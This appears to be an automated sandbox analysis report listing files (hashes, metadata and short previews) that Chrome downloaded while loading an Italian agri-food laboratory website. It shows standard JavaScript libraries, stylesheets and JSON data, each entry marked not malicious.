                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:R25CBW2Por27/PePg0KWGAKRcbW8Wwakq4pmqbrSRbiuVBKuGdBLAMqhn:RqCAWdWGAKAWZymqb+Liz0x
                                                                                                                                          MD5:81BE62A803B611E39570D97CE6417976
                                                                                                                                          SHA1:66C6F8756A30242EB9CFC59EDA6A91CFD94F7CA1
                                                                                                                                          SHA-256:87FAEB8E3816293208CF3BACCB71E9DA3DAAC08638F2F595A5DEBE0C4BE909A6
                                                                                                                                          SHA-512:BFC06852C36E58DE981AA92BF0307DD8952EBB5D3FC75126A514C4F58FEC0345BCDD53BAC7334A8CCF904FE46C70566B39775C6172FE9B1C39B556F0867DBD76
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*! Shuffle.js 3.1.1 - MIT */.!function(a){"function"==typeof define&&define.amd?define(["jquery","modernizr"],a):"object"==typeof exports?module.exports=a(require("jquery"),window.Modernizr):window.Shuffle=a(window.jQuery,window.Modernizr)}(function(a,b,c){"use strict";function d(a){return a?a.replace(/([A-Z])/g,function(a,b){return"-"+b.toLowerCase()}).replace(/^ms-/,"-ms-"):""}function e(b,c,d){var e,f,g,h=null,i=0;d=d||{};var j=function(){i=d.leading===!1?0:a.now(),h=null,g=b.apply(e,f),e=f=null};return function(){var k=a.now();i||d.leading!==!1||(i=k);var l=c-(k-i);return e=this,f=arguments,0>=l||l>c?(clearTimeout(h),h=null,i=k,g=b.apply(e,f),e=f=null):h||d.trailing===!1||(h=setTimeout(j,l)),g}}function f(a,b,c){for(var d=0,e=a.length;e>d;d++)if(b.call(c,a[d],d,a)==={})return}function g(b,c,d){return setTimeout(a.proxy(b,c),d)}function h(a){return Math.max.apply(Math,a)}function i(a){return Math.min.apply(Math,a)}function j(b){return a.isNumeric(b)?b:0}function k(a){var b,c,d=a.le
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (5342)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):5504
                                                                                                                                          Entropy (8bit):5.308660839803039
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:4NcM4y2jLx3bovPjMrgxkGGvCi1HBN7c3QESI+6PCv73E6ElB/:eF2PtrrGkGGvC6h9c3gI+iCv73EHlB
                                                                                                                                          MD5:BDF2E96352A6F039C6B045FD4CD4D082
                                                                                                                                          SHA1:56300B48DE913C866C723AA2520588918499FC4A
                                                                                                                                          SHA-256:3DF1F0A646C3020B4E27EAF7E983AAC4FF3D1D65BFCB94F0831F5CD5B1D11DC3
                                                                                                                                          SHA-512:D2F5514DDF0FAC64FC030D8228530AA20CC073C814B39BB2141388669D110AD3A66367BD703277CBF7AC157A03409E40599593F3D178FFB84CA0743115E5E8CE
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/modernizr.min.js?ver=1.8.2
                                                                                                                                          Preview:/*! modernizr 3.3.1 (Custom Build) | MIT *. * https://modernizr.com/download/?-cssanimations-csstransforms-csstransforms3d-csstransitions-prefixed-setclasses !*/.!function(e,n,t){function r(e,n){return typeof e===n}function s(){var e,n,t,s,i,o,a;for(var f in C)if(C.hasOwnProperty(f)){if(e=[],n=C[f],n.name&&(e.push(n.name.toLowerCase()),n.options&&n.options.aliases&&n.options.aliases.length))for(t=0;t<n.options.aliases.length;t++)e.push(n.options.aliases[t].toLowerCase());for(s=r(n.fn,"function")?n.fn():n.fn,i=0;i<e.length;i++)o=e[i],a=o.split("."),1===a.length?Modernizr[a[0]]=s:(!Modernizr[a[0]]||Modernizr[a[0]]instanceof Boolean||(Modernizr[a[0]]=new Boolean(Modernizr[a[0]])),Modernizr[a[0]][a[1]]=s),y.push((s?"":"no-")+a.join("-"))}}function i(e){var n=S.className,t=Modernizr._config.classPrefix||"";if(w&&(n=n.baseVal),Modernizr._config.enableJSClass){var r=new RegExp("(^|\\s)"+t+"no-js(\\s|$)");n=n.replace(r,"$1"+t+"js$2")}Modernizr._config.enableClasses&&(n+=" "+t+e.join(" "+t),w?S
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):9
                                                                                                                                          Entropy (8bit):2.94770277922009
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:mn:mn
                                                                                                                                          MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                          SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                          SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                          SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://kit.fontawesome.com/585b051251.js
                                                                                                                                          Preview:Forbidden
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (14278)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):14308
                                                                                                                                          Entropy (8bit):5.219792841585514
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:R25CBW2Por27/PePg0KWGAKRcbW8Wwakq4pmqbrSRbiuVBKuGdBLAMqhn:RqCAWdWGAKAWZymqb+Liz0x
                                                                                                                                          MD5:81BE62A803B611E39570D97CE6417976
                                                                                                                                          SHA1:66C6F8756A30242EB9CFC59EDA6A91CFD94F7CA1
                                                                                                                                          SHA-256:87FAEB8E3816293208CF3BACCB71E9DA3DAAC08638F2F595A5DEBE0C4BE909A6
                                                                                                                                          SHA-512:BFC06852C36E58DE981AA92BF0307DD8952EBB5D3FC75126A514C4F58FEC0345BCDD53BAC7334A8CCF904FE46C70566B39775C6172FE9B1C39B556F0867DBD76
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/shuffle.min.js?ver=1.8.2
                                                                                                                                          Preview:/*! Shuffle.js 3.1.1 - MIT */.!function(a){"function"==typeof define&&define.amd?define(["jquery","modernizr"],a):"object"==typeof exports?module.exports=a(require("jquery"),window.Modernizr):window.Shuffle=a(window.jQuery,window.Modernizr)}(function(a,b,c){"use strict";function d(a){return a?a.replace(/([A-Z])/g,function(a,b){return"-"+b.toLowerCase()}).replace(/^ms-/,"-ms-"):""}function e(b,c,d){var e,f,g,h=null,i=0;d=d||{};var j=function(){i=d.leading===!1?0:a.now(),h=null,g=b.apply(e,f),e=f=null};return function(){var k=a.now();i||d.leading!==!1||(i=k);var l=c-(k-i);return e=this,f=arguments,0>=l||l>c?(clearTimeout(h),h=null,i=k,g=b.apply(e,f),e=f=null):h||d.trailing===!1||(h=setTimeout(j,l)),g}}function f(a,b,c){for(var d=0,e=a.length;e>d;d++)if(b.call(c,a[d],d,a)==={})return}function g(b,c,d){return setTimeout(a.proxy(b,c),d)}function h(a){return Math.max.apply(Math,a)}function i(a){return Math.min.apply(Math,a)}function j(b){return a.isNumeric(b)?b:0}function k(a){var b,c,d=a.le
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (32007)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):50225
                                                                                                                                          Entropy (8bit):5.115807109499237
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:v1qQW+y4BILGJD222GpOKF3LGqZp13MJxuI4sRj39hJhHPcoklCJAM2yvAQgzJ:TKVwOKFk39hJmoVgV
                                                                                                                                          MD5:A0C1CD695B9FCE60789EBE184B7F4858
                                                                                                                                          SHA1:0DF74759ED146A50FEFA900E717D3AD49A666C2B
                                                                                                                                          SHA-256:6D5111475E8E0B9EC51CB0C4694DAA0EEA6A58BDF006FB80674995A664404D7D
                                                                                                                                          SHA-512:98306B2455FE90C31D9B368C019844DAA496F8ACC01BE6A6BDCA15FB777FBFDC035A1F3B4A55055D15558D9B48B381DB82276A69A81BD911C7FA368EEBC8CD96
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/slick.min.js?ver=1.8.2
                                                                                                                                          Preview:(function(factory){"use strict";if(typeof define==="function"&&define.amd){define(["jquery"],factory)}else if(typeof exports!=="undefined"){module.exports=factory(require("jquery"))}else{factory(jQuery)}})(function($){"use strict";var Slick=window.Slick||{};Slick=function(){var instanceUid=0;function Slick(element,settings){var _=this,dataSettings;_.defaults={accessibility:true,adaptiveHeight:false,appendArrows:$(element),appendDots:$(element),arrows:true,asNavFor:null,prevArrow:'<button type="button" data-role="none" class="slick-prev" aria-label="Previous" tabindex="0" role="button">Previous</button>',nextArrow:'<button type="button" data-role="none" class="slick-next" aria-label="Next" tabindex="0" role="button">Next</button>',autoplay:false,autoplaySpeed:3e3,centerMode:false,centerPadding:"50px",cssEase:"ease",customPaging:function(slider,i){return $('<button type="button" data-role="none" role="button" tabindex="0" />').text(i+1)},dots:false,dotsClass:"slick-dots",draggable:true,e
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):260
                                                                                                                                          Entropy (8bit):4.867566562849503
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:Y2iNAwNem0Lx2MALg98juOn5rh8juOG6MYm60:Y2J2Vg9ID5rhIDG6l8
                                                                                                                                          MD5:C431079369B8C0E4EF50C54B74324F9D
                                                                                                                                          SHA1:C04B0E20F319EEBA6E19A3353F6D484B841F73AE
                                                                                                                                          SHA-256:A54A4464825D33BF22ECE133A5AE67000982DCD82BA5649FF8A3C29AB36DA1FF
                                                                                                                                          SHA-512:6CECC3249B77B43E8A0E6D62F42C535D0F24152FF414F8BC8F5EA72F41F695A20AA80DCC3E341B6C5896C705829BB395B3BBFE097F199EEDEDC19311026CCCAD
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"agriparadigma.it.","type":15}],"Answer":[{"name":"agriparadigma.it.","type":15,"TTL":21600,"data":"10 mxpool.de2.hostedoffice.ag."}],"Comment":"Response from 85.94.194.108."}
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1139
                                                                                                                                          Entropy (8bit):4.690445916117134
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:qOmAJv7uGPTP9xyt2x9RgfpCnzy/rfOc5THFF:1jjZPhxoK9RgfpCnz+B5THFF
                                                                                                                                          MD5:B39E34E4140185252CB005E9C4CD16FA
                                                                                                                                          SHA1:A6EAACF4D7694C1EB935CB6E649064008F7C399D
                                                                                                                                          SHA-256:6CB839F4F44C74B2A104EA18D8FB8A9631E6B0BA42C9D3CED8CE7F6FDE28A9BD
                                                                                                                                          SHA-512:E446CD259A78C12407EF731D6BB0DADA53CEE724A33658BA92AEDE2FA4689FBA17739CDB719D2D4D574AB04AC167E823AB3D3F6B8DCB3FE6F0F9C6F0D3FF6DDA
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:{. "COUNTRY": {. "TITLE": "Nazione",. "AT": "Austria",. "BE": "Belgium",. "BG": "Bulgaria",. "CA": "Canada",. "CN": "China",. "CY": "Cyprus",. "DE": "Germany",. "GR": "Greece",. "IN": "India",. "IL": "Israel",. "IT": "Italy",. "JP": "Japan",. "MX": "Mexico",. "NL": "Netherlands",. "PL": "Poland",. "ES": "Spain",. "CH": "Switzerland",. "TR": "Turkey",. "GB": "United Kingdom",. "US": "USA",. "FR": "France". },. "INDUSTRY": {. "TITLE": "Settori Industriali",. "INDUS1": "Food & Feed",. "INDUS2": "Nutraceutical & Supplement",. "INDUS3": "Agriculture & Environment",. "INDUS4": "Agrosciences",. "INDUS5": "Beauty, Wash & Care",. "INDUS6": "Pharmaceutical & Medical",. "INDUS7": "Chemical Industry",. "INDUS8": "Tobacco and Consumer goods". },. "LABSERVICE": {. "TITLE": "Servizi di Laboratorio",. "LABSER1": "Physio Chemical",. "LABSER2": "Instrumental",. "LABSER3": "Microbiology",. "LA
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (5064), with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):5064
                                                                                                                                          Entropy (8bit):4.893189910695674
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:57osUc17WlOajf4mYC8DdLdTJk93ik8oLrWrzrsrT0:571eYC8ZLz
                                                                                                                                          MD5:216D791E61641ACE57D8D11A12BDE01E
                                                                                                                                          SHA1:28BDE6D98D1C689A712EFE037A9592E9FA103B09
                                                                                                                                          SHA-256:029DEDF319BC4536D9C663AE9C0B10C95D1E9F5DD1DE0AA73172E9E89AE254CC
                                                                                                                                          SHA-512:CD31993E3719A13C971386CBCA73AE88CB95E0833F2E8D9CD8FF9E0D070CEE43589A4DC34FD973A9E2001AEEEB0EA9CF44E96B7536F85F2A31A47F33E6C9FAC8
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/cookie-notice/css/front.min.css?ver=2.5.4
                                                                                                                                          Preview:#cookie-notice,#cookie-notice .cn-button:not(.cn-button-custom){font-family:-apple-system,BlinkMacSystemFont,Arial,Roboto,"Helvetica Neue",sans-serif;font-weight:400;font-size:13px;text-align:center}#cookie-notice{position:fixed;min-width:100%;height:auto;z-index:100000;letter-spacing:0;line-height:20px;left:0}#cookie-notice,#cookie-notice *{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}#cookie-notice.cn-animated{-webkit-animation-duration:.5s!important;animation-duration:.5s!important;-webkit-animation-fill-mode:both;animation-fill-mode:both}#cookie-notice.cn-animated.cn-effect-none{-webkit-animation-duration:1ms!important;animation-duration:1ms!important}#cookie-notice .cookie-notice-container,#cookie-notice .cookie-revoke-container{display:block}#cookie-notice.cookie-notice-hidden .cookie-notice-container,#cookie-notice.cookie-revoke-hidden .cookie-revoke-container{display:none}.cn-position-top{top:0}.cn-position-bottom{bottom:0}.cookie-notice-contai
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):245638
                                                                                                                                          Entropy (8bit):4.398782976205756
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:kRZTP/EhnBUpGgbrIU1PbAfJhaX2nHe3puA2NwY4PsGEGy+SQBWI6FkRXk5+NBH5:FUjTg8meeQ9LVpjCA
                                                                                                                                          MD5:19ED28FA527C4664A43E357EF6426CAE
                                                                                                                                          SHA1:A48E230702E8007EF00DC356F5AEFD96EF62ABB8
                                                                                                                                          SHA-256:29463A97E005CE5C927683D9EEBCAA2C496D99B1E29F95857418E0DAB51A5E80
                                                                                                                                          SHA-512:15BDC9EAB9428D25BBCBC000634552BDBC39002927B9E34B97CDC1A2879DD2B17C87B7CDB8C41597D06BF51A44D7EDC06FC40DF4A0250EFCECBCFC10E67008B2
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:am4internal_webpackJsonp(["fcaa"],{ATzU:function(e,t,o){"use strict";Object.defineProperty(t,"__esModule",{value:!0});window.am4geodata_worldLow={type:"FeatureCollection",features:[{type:"Feature",geometry:{type:"Polygon",coordinates:[[[179.2223,-8.554],[179.2023,-8.4653],[179.2312,-8.5048],[179.2223,-8.554]]]},properties:{name:"Tuvalu",id:"TV"},id:"TV"},{type:"Feature",geometry:{type:"Polygon",coordinates:[[[3.4624,-54.4471],[3.3461,-54.4511],[3.3669,-54.3997],[3.4814,-54.4001],[3.4624,-54.4471]]]},properties:{name:"Bouvet Island",id:"BV"},id:"BV"},{type:"Feature",geometry:{type:"Polygon",coordinates:[[[-5.3345,36.1623],[-5.3382,36.1122],[-5.3562,36.1264],[-5.3551,36.1455],[-5.3345,36.1623]]]},properties:{name:"Gibraltar",id:"GI"},id:"GI"},{type:"Feature",geometry:{type:"Polygon",coordinates:[[[47.3029,-11.5752],[47.282,-11.5747],[47.2789,-11.5574],[47.2971,-11.5543],[47.3029,-11.5752]]]},properties:{name:"Glorioso Islands",id:"GO"},id:"GO"},{type:"Feature",geometry:{type:"Polygon",co
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):321
                                                                                                                                          Entropy (8bit):4.982434990202744
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:kX639/gIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kEBgIOuHhA/XvoPPWV5k
                                                                                                                                          MD5:6B7A647D1B9880C6686665F8D0AE141A
                                                                                                                                          SHA1:656E4724C547D3E5CEE34DF5D845EE4EA2FE6BE1
                                                                                                                                          SHA-256:24EE2A6B42F33AE6D67EFCD03BEC7C1A337E5226064AD6026878AA08AF2CDFAB
                                                                                                                                          SHA-512:85318BF359EC14F8D254988C99D250B9E3C36494E73078B97A47E886B6548E477531C88D78E38FB106E46724F24C134571B602FDEC6B1051E32B5FC917F8A1D1
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://ipinfo.io/json
                                                                                                                                          Preview:{. "ip": "8.46.123.228",. "hostname": "static-cpe-8-46-123-228.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (11126)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):11224
                                                                                                                                          Entropy (8bit):5.2603128465032745
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:JrprDNvD66fPP/+I6OP1fQP0OIr96DB6MHXcwr1RF:JrprxG6fPP3P1fQMOIsDsMMS
                                                                                                                                          MD5:79B4956B7EC478EC10244B5E2D33AC7D
                                                                                                                                          SHA1:A46025B9D05E3DF30D610A8AEF14F392C7058DC9
                                                                                                                                          SHA-256:029E0A2E809FD6B5DBE76ABE8B7A74936BE306C9A8C27C814C4D44AA54623300
                                                                                                                                          SHA-512:217F86FEE871FA36ECA4F25830E3917C7BF57A681140B135C508AA32F2A1E3EFF5A80661F3B5BA46747D0C305AF10B658D207F449550F3D417D9683216FEEA8F
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                                                                                                                                          Preview:/*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],i=1;i<=3;i++){if(+o[i]<+n[i])return 1;if(+n[i]<+o[i])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.3.2",n.console&&n.console.log&&(s&&e("3.0.0")||n.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"),s.migrateWarnings&&n.console.log("JQMIGRATE: Migrate plugin loaded multiple times"),n.console.log("JQMIGRATE: Migrate is installed"+(s.migrateMute?"":" with logging active")+", version "+s.migrateVersion));var r={};function u(e){var t=n.console;s.migrateDeduplicateWarnings&&r[e]||(r[e]=!0
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):316
                                                                                                                                          Entropy (8bit):4.452047041470458
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:ZToL1kLDFA/hNLDFA/hZXEvRLDFA/h4SK5L1fPLDFA/hNLDFA/hZXEvRLDFA/hY:Zk1wD6/TD6/fXEvxD6/cl1fzD6/TD6/i
                                                                                                                                          MD5:9730086EEFB28D971B315173F579B3B0
                                                                                                                                          SHA1:A9845EA261AEF600305F310C15D83232EE33460D
                                                                                                                                          SHA-256:9C0647C53DDE19CD56B2DFD0626DB41F3DB20C92984E1E6A4D469C19E4823ADF
                                                                                                                                          SHA-512:B28EF6959E731070848840AD6EE7837D05826216B6BAA44FD2FEEEF89361788C0ABF7F1567E3658F99A90C83EF524C752F9ACA403E1336508D2C076D25AC3AE7
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect-frontend.min.css?ver=1.1
                                                                                                                                          Preview:.popup-template .modal {... opacity: 0;... -webkit-transition: all 250ms ease;... -o-transition: all 250ms ease;... transition: all 250ms ease;...}.......popup-template .modal.is-open {... opacity: 1;... -webkit-transition: all 250ms ease;... -o-transition: all 250ms ease;... transition: all 250ms ease;...}
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (9381)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):71756
                                                                                                                                          Entropy (8bit):5.1567423471130756
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:GztapFIn/3GaqYbaFUpXufLS28FvxYmkxlrWgV2hY6eOjRTG5G++TF491TyKN6c/:FM/GaqYbaFUpXufLS28FvxYmkxlygkh8
                                                                                                                                          MD5:E94DFF882C297B8CD0D1C432C700C3CB
                                                                                                                                          SHA1:3793835B348B26B994C34B660B68CBFD119A9A57
                                                                                                                                          SHA-256:56917DCEE3CB17B0FCE4D8D51D9597E24DF081FF80CAFE6350ECC59952CD817C
                                                                                                                                          SHA-512:4F52C1EB801B3AE4451763CDBF4FC3371B74BFB31A9325EA427DAF426E0E5F2E0287AAD679D4424F9D37BCA12F2FE68E47BCA6C8F89D6F06B47597C9C6AF706A
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/
                                                                                                                                          Preview:<!doctype html>.<html lang="it-IT">. <head>. <meta charset="utf-8">. <meta http-equiv="x-ua-compatible" content="ie=edge">. <meta name="viewport" content="width=device-width, initial-scale=1">. <link rel="icon" href="https://www.agriparadigma.it/wp-content/themes/tentamus-labor/favicon-71.ico" type="images/x-icon" />. <title>Agriparadigma</title>.. The SEO Framework by Sybre Waaijer -->.<link rel="canonical" href="https://www.agriparadigma.it/" />.<meta name="description" content="La fitta rete di norme cogenti e certificazioni volontarie che regolano il settore agroalimentare, richiedono un serrato controllo: dalle materie prime ai&#8230;" />.<meta property="og:type" content="website" />.<meta property="og:locale" content="it_IT" />.<meta property="og:site_name" content="Agriparadigma" />.<meta property="og:title" content="Agriparadigma" />.<meta property="og:description" content="La fitta rete di norme cogenti e certificazioni volontarie che regolano il settore agroalim
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):271751
                                                                                                                                          Entropy (8bit):5.0685414131801165
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:+tah6/K+TCtlMhTze/RZcYmDizK8dB7alFys/WL/umH4N0IPfKu5AA11vrIY:9pZcYmDcHwFygmY1PfjAA1Br3
                                                                                                                                          MD5:6A07DA9FAE934BAF3F749E876BBFDD96
                                                                                                                                          SHA1:46A436EBA01C79ACDB225757ED80BF54BAD6416B
                                                                                                                                          SHA-256:D8AA24ECC6CECB1A60515BC093F1C9DA38A0392612D9AB8AE0F7F36E6EEE1FAD
                                                                                                                                          SHA-512:E525248B09A6FB4022244682892E67BBF64A3E875EB889DB43B0A24AB4A75077B5D5D26943CA382750D4FEBC3883193F3BE581A4660065B6FC7B5EC20C4A044B
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*!. * jQuery JavaScript Library v3.3.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2018-01-20T17:24Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):514046
                                                                                                                                          Entropy (8bit):5.33603464169984
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:yLNfj0D+emNTHQLcLiUdc9sahLfe4mNUGDKWoju+uk1ojL0dE9Tho2qBf5EMnui:yLJemNELcLiUdRKm+ukojL0dpH
                                                                                                                                          MD5:CA383FD3A8075807DF55FED12C3EB5FD
                                                                                                                                          SHA1:D1C84E76188DE600F9F2C1B06428268FE15A624D
                                                                                                                                          SHA-256:2403A6DB6C32A06CBE7D7665CCD56B597E34FA9CD8EFD8C22B99D06AC926F153
                                                                                                                                          SHA-512:A2AEFD0E0D6D72E3DC0972FBA6EAEBABE834E3461F04E406C8B6F19E4DA0DCDB083E0C358ADA0DF8B4B238913B81626A67E7F497516C05E04CEDB292D89F16B5
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:[{"id":5,"name":"L.A.B.","url":"https://www.lab-sl.com","web":"lab-sl.com","contact":"Juan Ramirez Cassinello | +34 672 385 863 | jramirez@lab-sl.com","lab_services":"","industries":"","special_services":"","industry":["*",5,1,3],"service":["*",3,2,1],"lang":"es_ES","related":{"en_US":55},"options":{"adress":"<p><span>C/Albert Einstein, 7,\u00a0</span><span>(PITA)<br />\nAutovia del Mediterr\u00e1neo (A7)<br />\nSalida 460, 04131 Almer\u00eda, Spain<br />\n</span></p>\n<p>Phone: +34 950 259 057</p>\n<p><span>\u00a0</span></p>\n","background_color":"#006342","body_start_option":" Google Tag Manager (noscript) -->\r\n<iframe src=\"https://www.googletagmanager.com/ns.html?id=GTM-5Z8C9WN\" height=\"0\" width=\"0\"></iframe>\r\n End Google Tag Manager (noscript) -->","breadcrumb":false,"city":"Almer\u00eda","city_copiar":"Almer\u00eda","coming_soon":false,"contact":"Juan Ramirez Cassinello | +34 672 385 863 | jramirez@lab-sl.com","country":"es","custom_styles":"","description":"<h2
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (5477)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):5629
                                                                                                                                          Entropy (8bit):5.064978927674849
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:PwRxr6JAXgWWwrrSTrmM4KvlGC89QPjRxq2uVBXeHRGKrc4oPUGPgNhd+qLoBV7J:Pwjrycrr3rKvE9IjRxjGjgNhdTLo3re+
                                                                                                                                          MD5:3A56752B736635BF69CB069B8818CBFD
                                                                                                                                          SHA1:42E0951FE74BB3F56A30F51291823BCD4A84D76E
                                                                                                                                          SHA-256:FF4BD34AA98A0214833619D3D751838DB015722DFBBEC15CD14DADC66CD67869
                                                                                                                                          SHA-512:A255D61DE4E6CEC2084AAE0F027CCC0259039AEF62268A27072C8097D348D76BB725CA35563386CEB068387C9AD3AB0E331BD270BA754A38A2A2D33944F305F5
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-includes/js/imagesloaded.min.js?ver=4.1.4
